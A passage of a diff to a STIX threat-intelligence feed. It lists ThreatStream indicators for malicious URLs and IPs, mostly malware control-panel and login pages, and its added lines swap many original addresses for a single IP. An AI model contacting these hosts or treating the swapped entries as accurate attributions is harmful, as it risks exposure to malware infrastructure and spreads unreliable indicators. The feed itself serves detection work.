'http://hypercleaner.su/auth.php']","type":"indicator","valid_from":"2020-02-03T01:58:15.744Z"} {"created":"2020-02-03T01:58:28.73Z","description":"TS ID: 55283402095; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--cae5efb7-ff91-4a8d-bf28-21ffff0e4994","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-03T01:58:28.73Z","name":"mal_url: http://pnny.kommanditgesel.icu/news/plast/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://pnny.kommanditgesel.icu/news/plast/admin.php']","type":"indicator","valid_from":"2020-02-03T01:58:28.73Z"} {"created":"2020-02-03T01:59:18.132Z","description":"TS ID: 55283402096; iType: mal_url; State: active; Org: PT Master Web Network; Source: CyberCrime","id":"indicator--1644ebf0-46d0-4dcc-8e04-3a58376cc625","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-58"],"modified":"2020-02-03T01:59:18.132Z","name":"mal_url: http://pa-buol.go.id/wp/panelnew/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://pa-buol.go.id/wp/panelnew/admin.php']","type":"indicator","valid_from":"2020-02-03T01:59:18.132Z"} -{"created":"2020-02-03T01:59:28.343Z","description":"TS ID: 55283402103; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--a6588ee7-309e-49de-9884-faa2bdd702d2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-62"],"modified":"2020-02-03T01:59:28.343Z","name":"mal_url: http://5.188.60.59/auth.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://5.188.60.59/auth.php']","type":"indicator","valid_from":"2020-02-03T01:59:28.343Z"} +{"created":"2020-02-03T01:59:28.343Z","description":"TS ID: 55283402103; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--a6588ee7-309e-49de-9884-faa2bdd702d2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-62"],"modified":"2020-02-03T01:59:28.343Z","name":"mal_url: http://89.160.20.156/auth.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/auth.php']","type":"indicator","valid_from":"2020-02-03T01:59:28.343Z"} {"created":"2020-02-03T01:59:33.587Z","description":"TS ID: 55283402100; iType: mal_url; State: active; Org: Com Telecom; Source: CyberCrime","id":"indicator--8d5e44f6-7283-40f8-b9b3-2c4791832c4e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-03T01:59:33.587Z","name":"mal_url: http://anorelier.hk/fshblfn8071/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://anorelier.hk/fshblfn8071/admin.php']","type":"indicator","valid_from":"2020-02-03T01:59:33.587Z"} {"created":"2020-02-03T01:59:54.52Z","description":"TS ID: 55283402099; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--f33dd90a-b849-42af-9bcb-f60476358305","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-03T01:59:54.52Z","name":"mal_url: http://bendetta.online/mangooste/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://bendetta.online/mangooste/admin.php']","type":"indicator","valid_from":"2020-02-03T01:59:54.52Z"} {"created":"2020-02-03T01:59:54.544Z","description":"TS ID: 55283402097; iType: mal_url; State: active; Org: Relink LTD; Source: CyberCrime","id":"indicator--27f2f598-95d6-4e35-a42e-240093d4452d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-03T01:59:54.544Z","name":"mal_url: http://kayfundz.ru/kay/eng/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://kayfundz.ru/kay/eng/admin.php']","type":"indicator","valid_from":"2020-02-03T01:59:54.544Z"} {"created":"2020-02-05T01:58:09.73Z","description":"TS ID: 55287965572; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime","id":"indicator--65a8989b-25c3-498e-8247-0514d5aa719e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-74"],"modified":"2020-02-05T01:58:09.73Z","name":"mal_url: http://unrrwa.org/rich/Panel/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://unrrwa.org/rich/Panel/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-05T01:58:09.73Z"} -{"created":"2020-02-05T01:58:17.365Z","description":"TS ID: 55287965584; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--e531a668-ef25-4b16-aa50-1b0b8f0f901e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-72"],"modified":"2020-02-05T01:58:17.365Z","name":"mal_url: http://193.142.59.7/hoist3/logs/omc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://193.142.59.7/hoist3/logs/omc.php']","type":"indicator","valid_from":"2020-02-05T01:58:17.365Z"} -{"created":"2020-02-05T01:58:17.428Z","description":"TS ID: 55287965574; iType: mal_ip; State: active; Org: LLC Baxet; Source: CyberCrime","id":"indicator--7aed3145-aab6-470d-bb4f-592d86654719","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-66"],"modified":"2020-02-05T01:58:17.428Z","name":"mal_ip: 46.29.161.60","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '46.29.161.60']","type":"indicator","valid_from":"2020-02-05T01:58:17.428Z"} +{"created":"2020-02-05T01:58:17.365Z","description":"TS ID: 55287965584; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--e531a668-ef25-4b16-aa50-1b0b8f0f901e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-72"],"modified":"2020-02-05T01:58:17.365Z","name":"mal_url: http://89.160.20.156/hoist3/logs/omc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/hoist3/logs/omc.php']","type":"indicator","valid_from":"2020-02-05T01:58:17.365Z"} +{"created":"2020-02-05T01:58:17.428Z","description":"TS ID: 55287965574; iType: mal_ip; State: active; Org: LLC Baxet; Source: CyberCrime","id":"indicator--7aed3145-aab6-470d-bb4f-592d86654719","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-66"],"modified":"2020-02-05T01:58:17.428Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-05T01:58:17.428Z"} {"created":"2020-02-05T01:58:31.683Z","description":"TS ID: 55287965571; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--af8e5326-c1d4-4f9e-8f47-ee23c6a2606a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-05T01:58:31.683Z","name":"mal_url: http://xigkxc.xyz/Atoz/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://xigkxc.xyz/Atoz/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-05T01:58:31.683Z"} -{"created":"2020-02-05T01:58:31.704Z","description":"TS ID: 55287965557; iType: mal_url; State: active; Org: 1&1 Internet AG; Source: CyberCrime","id":"indicator--59c28566-62b0-4102-ad17-53ec3a143144","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-02-05T01:58:31.704Z","name":"mal_url: http://217.160.59.64/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://217.160.59.64/panel/admin.php']","type":"indicator","valid_from":"2020-02-05T01:58:31.704Z"} -{"created":"2020-02-05T01:58:32.111Z","description":"TS ID: 55287965585; iType: mal_url; State: active; Org: Global Frag Networks; Source: CyberCrime","id":"indicator--56524b03-3217-40a0-9180-dc8262b3b6f9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-05T01:58:32.111Z","name":"mal_url: http://104.223.170.113/Silkop/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://104.223.170.113/Silkop/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-05T01:58:32.111Z"} +{"created":"2020-02-05T01:58:31.704Z","description":"TS ID: 55287965557; iType: mal_url; State: active; Org: 1&1 Internet AG; Source: CyberCrime","id":"indicator--59c28566-62b0-4102-ad17-53ec3a143144","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-02-05T01:58:31.704Z","name":"mal_url: http://89.160.20.156/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/panel/admin.php']","type":"indicator","valid_from":"2020-02-05T01:58:31.704Z"} +{"created":"2020-02-05T01:58:32.111Z","description":"TS ID: 55287965585; iType: mal_url; State: active; Org: Global Frag Networks; Source: CyberCrime","id":"indicator--56524b03-3217-40a0-9180-dc8262b3b6f9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-05T01:58:32.111Z","name":"mal_url: http://89.160.20.156/Silkop/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/Silkop/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-05T01:58:32.111Z"} {"created":"2020-02-05T01:58:32.145Z","description":"TS ID: 55287965577; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime","id":"indicator--69661075-e6cb-4054-820c-61954757f0ba","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-05T01:58:32.145Z","name":"mal_url: http://plosss.com/lok/Panel/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://plosss.com/lok/Panel/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-05T01:58:32.145Z"} {"created":"2020-02-05T01:58:34.795Z","description":"TS ID: 55287965581; iType: mal_url; State: active; Org: Domain names registrar REG.RU, Ltd; Source: CyberCrime","id":"indicator--5be6be50-c2ef-4502-857e-f69dd17d37a9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-02-05T01:58:34.795Z","name":"mal_url: http://everest--sh.com/coco/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://everest--sh.com/coco/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-05T01:58:34.795Z"} {"created":"2020-02-05T01:58:34.836Z","description":"TS ID: 55287965567; iType: mal_url; State: active; Org: Alibaba; Source: CyberCrime","id":"indicator--7de3f68d-51ed-43c0-b5d9-c63d621aa99f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-02-05T01:58:34.836Z","name":"mal_url: http://domainmanagerz.net/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://domainmanagerz.net/login']","type":"indicator","valid_from":"2020-02-05T01:58:34.836Z"} {"created":"2020-02-05T01:58:41.381Z","description":"TS ID: 55287965564; iType: mal_url; State: active; Org: A2 Hosting; Source: CyberCrime","id":"indicator--08ec347d-3d22-45e6-96fc-3fc3bb37c720","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-52"],"modified":"2020-02-05T01:58:41.381Z","name":"mal_url: http://groupbizconsulting.com/p3/webpanel/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://groupbizconsulting.com/p3/webpanel/login.php']","type":"indicator","valid_from":"2020-02-05T01:58:41.381Z"} {"created":"2020-02-05T01:58:59.279Z","description":"TS ID: 55287965569; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime","id":"indicator--b845a78e-d141-455e-92ff-df401787a3cd","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-05T01:58:59.279Z","name":"mal_url: http://samundarmarine.com/denty/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://samundarmarine.com/denty/admin.php']","type":"indicator","valid_from":"2020-02-05T01:58:59.279Z"} {"created":"2020-02-05T01:59:03.426Z","description":"TS ID: 55287965563; iType: mal_url; State: active; Org: A2 Hosting; Source: CyberCrime","id":"indicator--e9d4f82a-bc23-4f9a-81e0-05097acc6daa","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-52"],"modified":"2020-02-05T01:59:03.426Z","name":"mal_url: http://groupbizconsulting.com/p4/webpanel/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://groupbizconsulting.com/p4/webpanel/login.php']","type":"indicator","valid_from":"2020-02-05T01:59:03.426Z"} -{"created":"2020-02-05T01:59:04.695Z","description":"TS ID: 55287965555; iType: mal_ip; State: active; Org: Hetzner Online GmbH; Source: CyberCrime","id":"indicator--57e76166-d475-4027-b2d9-b4910c5b0747","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-32"],"modified":"2020-02-05T01:59:04.695Z","name":"mal_ip: 138.201.56.185","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '138.201.56.185']","type":"indicator","valid_from":"2020-02-05T01:59:04.695Z"} +{"created":"2020-02-05T01:59:04.695Z","description":"TS ID: 55287965555; iType: mal_ip; State: active; Org: Hetzner Online GmbH; Source: CyberCrime","id":"indicator--57e76166-d475-4027-b2d9-b4910c5b0747","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-32"],"modified":"2020-02-05T01:59:04.695Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-05T01:59:04.695Z"} {"created":"2020-02-05T01:59:06.271Z","description":"TS ID: 55287965580; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--63fdc395-3d7f-4435-a7ea-2c26783ea7b9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-05T01:59:06.271Z","name":"mal_url: http://gpi-q.com/cake/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://gpi-q.com/cake/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-05T01:59:06.271Z"} {"created":"2020-02-05T01:59:24.611Z","description":"TS ID: 55287965562; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--9ed89f91-5df1-4cad-b6e7-9d275759d32e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-05T01:59:24.611Z","name":"mal_url: http://ipblasta.com/kmaker/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ipblasta.com/kmaker/login.php']","type":"indicator","valid_from":"2020-02-05T01:59:24.611Z"} {"created":"2020-02-05T01:59:31.341Z","description":"TS ID: 55287965559; iType: mal_url; State: active; Org: Mills College; Source: CyberCrime","id":"indicator--421221e0-b0c7-4bbe-a12c-412f689f4769","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-55"],"modified":"2020-02-05T01:59:31.341Z","name":"mal_url: http://softtouchcollars.com/origin/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://softtouchcollars.com/origin/login.php']","type":"indicator","valid_from":"2020-02-05T01:59:31.341Z"} -{"created":"2020-02-05T01:59:47.461Z","description":"TS ID: 55287965566; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--369ccb92-5a3b-41cf-853f-dac750e7a9d6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-21"],"modified":"2020-02-05T01:59:47.461Z","name":"mal_ip: 162.241.216.92","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '162.241.216.92']","type":"indicator","valid_from":"2020-02-05T01:59:47.461Z"} -{"created":"2020-02-05T01:59:47.506Z","description":"TS ID: 55287965561; iType: mal_ip; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--5fb846be-33fa-4bcb-ac9f-ad6a31e4daef","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-05T01:59:47.506Z","name":"mal_ip: 89.208.84.96","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.208.84.96']","type":"indicator","valid_from":"2020-02-05T01:59:47.506Z"} +{"created":"2020-02-05T01:59:47.461Z","description":"TS ID: 55287965566; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--369ccb92-5a3b-41cf-853f-dac750e7a9d6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-21"],"modified":"2020-02-05T01:59:47.461Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-05T01:59:47.461Z"} +{"created":"2020-02-05T01:59:47.506Z","description":"TS ID: 55287965561; iType: mal_ip; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--5fb846be-33fa-4bcb-ac9f-ad6a31e4daef","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-05T01:59:47.506Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-05T01:59:47.506Z"} {"created":"2020-02-05T02:00:16.19Z","description":"TS ID: 55287965578; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime","id":"indicator--1a4e59e6-28dd-4087-9a19-b5d274d484d5","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-96"],"modified":"2020-02-05T02:00:16.19Z","name":"mal_url: http://mikeservers.eu/kings/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://mikeservers.eu/kings/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-05T02:00:16.19Z"} {"created":"2020-02-05T02:00:23.009Z","description":"TS ID: 55287965575; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--aef5784f-1ba2-4f45-9345-9b96bffe3cfd","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-53"],"modified":"2020-02-05T02:00:23.009Z","name":"mal_url: http://printystore.com.pe/img/lop/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://printystore.com.pe/img/lop/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-05T02:00:23.009Z"} {"created":"2020-02-05T02:00:29.679Z","description":"TS ID: 55287965579; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime","id":"indicator--5fbeda08-8cf4-459a-873c-28cef82221b5","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-05T02:00:29.679Z","name":"mal_url: http://kdi-kongsberg.com/stan/Panel/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://kdi-kongsberg.com/stan/Panel/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-05T02:00:29.679Z"} @@ -335,17 +335,17 @@ {"created":"2020-02-05T02:00:57.172Z","description":"TS ID: 55287965586; iType: mal_url; State: active; Org: Hetzner Online GmbH; Source: CyberCrime","id":"indicator--18a1307c-2dfc-43f9-9e47-93d00c63efcc","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-24"],"modified":"2020-02-05T02:00:57.172Z","name":"mal_url: http://video-ld.ru/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://video-ld.ru/panel/admin.php']","type":"indicator","valid_from":"2020-02-05T02:00:57.172Z"} {"created":"2020-02-05T02:00:57.733Z","description":"TS ID: 55287965560; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--1e94e26d-5158-4519-b166-2b7e87c2e5de","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-75"],"modified":"2020-02-05T02:00:57.733Z","name":"mal_url: http://nortonlilly.info/emma/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://nortonlilly.info/emma/login.php']","type":"indicator","valid_from":"2020-02-05T02:00:57.733Z"} {"created":"2020-02-05T02:01:03.604Z","description":"TS ID: 55287965573; iType: mal_url; State: active; Org: Relink LTD; Source: CyberCrime","id":"indicator--e396f12a-867b-4e91-8796-d042aef55ce3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-05T02:01:03.604Z","name":"mal_url: http://trouserlanditd.com/didi/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://trouserlanditd.com/didi/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-05T02:01:03.604Z"} -{"created":"2020-02-05T02:01:16.051Z","description":"TS ID: 55287965589; iType: mal_ip; State: active; Org: Tencent Cloud Computing (Beijing) Co.; Source: CyberCrime","id":"indicator--5b35dbd2-4915-4c56-9213-7d5272715cb7","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-05T02:01:16.051Z","name":"mal_ip: 170.106.50.37","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '170.106.50.37']","type":"indicator","valid_from":"2020-02-05T02:01:16.051Z"} +{"created":"2020-02-05T02:01:16.051Z","description":"TS ID: 55287965589; iType: mal_ip; State: active; Org: Tencent Cloud Computing (Beijing) Co.; Source: CyberCrime","id":"indicator--5b35dbd2-4915-4c56-9213-7d5272715cb7","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-05T02:01:16.051Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-05T02:01:16.051Z"} {"created":"2020-02-05T02:01:18.261Z","description":"TS ID: 55287965582; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--8dff68c1-1114-4092-9f29-f655f27d2337","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-60"],"modified":"2020-02-05T02:01:18.261Z","name":"mal_url: http://espoirpharmaceutical.com/includes/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://espoirpharmaceutical.com/includes/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-05T02:01:18.261Z"} {"created":"2020-02-05T02:01:18.285Z","description":"TS ID: 55287965565; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--19636e7d-febc-4ae1-879a-28af129c19b3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-60"],"modified":"2020-02-05T02:01:18.285Z","name":"mal_url: http://credoaz.com/journals/webpanel/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://credoaz.com/journals/webpanel/login.php']","type":"indicator","valid_from":"2020-02-05T02:01:18.285Z"} {"created":"2020-02-05T02:01:21.73Z","description":"TS ID: 55287965587; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--593225c7-68c8-44db-82bf-2c550931a60c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-69"],"modified":"2020-02-05T02:01:21.73Z","name":"mal_url: http://bestlogs.myjino.ru/best/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://bestlogs.myjino.ru/best/admin.php']","type":"indicator","valid_from":"2020-02-05T02:01:21.73Z"} -{"created":"2020-02-06T02:10:08.953Z","description":"TS ID: 55290730789; iType: mal_url; State: active; Org: TimeWeb Ltd.; Source: CyberCrime","id":"indicator--782e9560-3f13-43eb-9720-e5b43d9a8dd9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-06T02:10:08.953Z","name":"mal_url: http://46.229.215.123/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://46.229.215.123/login']","type":"indicator","valid_from":"2020-02-06T02:10:08.953Z"} +{"created":"2020-02-06T02:10:08.953Z","description":"TS ID: 55290730789; iType: mal_url; State: active; Org: TimeWeb Ltd.; Source: CyberCrime","id":"indicator--782e9560-3f13-43eb-9720-e5b43d9a8dd9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-06T02:10:08.953Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-02-06T02:10:08.953Z"} {"created":"2020-02-06T02:10:15.947Z","description":"TS ID: 55290730799; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime","id":"indicator--9586420f-3737-47b6-8d58-526f629d66e2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-06T02:10:15.947Z","name":"mal_url: http://justwer.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://justwer.site/login']","type":"indicator","valid_from":"2020-02-06T02:10:15.947Z"} -{"created":"2020-02-06T02:10:15.988Z","description":"TS ID: 55290730784; iType: mal_ip; State: active; Org: InMotion Hosting; Source: CyberCrime","id":"indicator--4d0f3370-af7d-4902-abea-65d9f924458b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-52"],"modified":"2020-02-06T02:10:15.988Z","name":"mal_ip: 173.247.252.61","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '173.247.252.61']","type":"indicator","valid_from":"2020-02-06T02:10:15.988Z"} +{"created":"2020-02-06T02:10:15.988Z","description":"TS ID: 55290730784; iType: mal_ip; State: active; Org: InMotion Hosting; Source: CyberCrime","id":"indicator--4d0f3370-af7d-4902-abea-65d9f924458b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-52"],"modified":"2020-02-06T02:10:15.988Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-06T02:10:15.988Z"} {"created":"2020-02-06T02:10:22.051Z","description":"TS ID: 55290730781; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--12dac6fb-e53b-4742-9cc4-da362e880571","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-02-06T02:10:22.051Z","name":"mal_url: http://u-knlt.com/Pablo/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://u-knlt.com/Pablo/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-06T02:10:22.051Z"} -{"created":"2020-02-06T02:10:23.024Z","description":"TS ID: 55290730808; iType: mal_ip; State: active; Org: Best-Hoster Group Co. Ltd.; Source: 